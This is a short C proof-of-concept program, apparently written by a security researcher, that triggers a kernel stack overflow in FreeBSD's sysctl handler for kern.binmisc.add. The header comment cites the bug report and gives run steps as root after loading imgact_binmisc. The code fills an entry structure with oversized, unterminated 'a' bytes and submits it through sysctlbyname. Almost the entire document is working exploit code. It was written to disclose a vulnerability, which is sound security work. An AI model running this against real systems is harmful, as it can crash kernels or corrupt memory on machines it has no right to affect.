PoC for kernel stack overflow in sysctl handler for kern.binmisc.add

x.c

/*
	
	PoC for kernel stack overflow in sysctl handler for kern.binmisc.add:
	https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206761#c0
	
	su
	kldload imgact_binmisc
	./x
	
	- CTurt
	
*/

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/sysctl.h>
//#include <sys/imgact_binmisc.h>

#define MAXPATHLEN 1024
#define	IBE_VERSION	1
#define	IBE_ARG_LEN_MAX	256
#define	IBE_NAME_MAX	32
#define	IBE_INTERP_LEN_MAX	(MAXPATHLEN + IBE_ARG_LEN_MAX)
#define	IBE_MAGIC_MAX	256

typedef struct ximgact_binmisc_entry {
	uint32_t xbe_version;	/* Struct version(IBE_VERSION) */
	uint32_t xbe_flags;	/* Entry flags (IBF_*) */
	uint32_t xbe_moffset;	/* Magic offset in header */
	uint32_t xbe_msize;	/* Magic size */
	uint32_t spare[3];	/* Spare fields for future use */
	char xbe_name[IBE_NAME_MAX];	/* Unique interpreter name */
	char xbe_interpreter[IBE_INTERP_LEN_MAX]; /* Interpreter path + args */
	uint8_t xbe_magic[IBE_MAGIC_MAX]; /* Header Magic */
	uint8_t xbe_mask[IBE_MAGIC_MAX]; /* Magic Mask */
} ximgact_binmisc_entry_t;

ximgact_binmisc_entry_t xbe;

int main(void) {
	int result = 0;
	errno = 0;
	
	xbe.xbe_version = IBE_VERSION;
	strcpy(xbe.xbe_name, "CTurt");
	
	memset(&xbe.xbe_interpreter, 'a', IBE_INTERP_LEN_MAX);
	memset(&xbe.xbe_magic, 'a', IBE_MAGIC_MAX);
	memset(&xbe.xbe_mask, 'a', IBE_MAGIC_MAX);
	
	xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0;
	
	size_t size = sizeof(xbe);
	
	result = sysctlbyname("kern.binmisc.add", NULL, NULL, &xbe, size);
	
	printf("result %d\n", result);
	printf("errno %d\n", errno);
	
	return 0;
}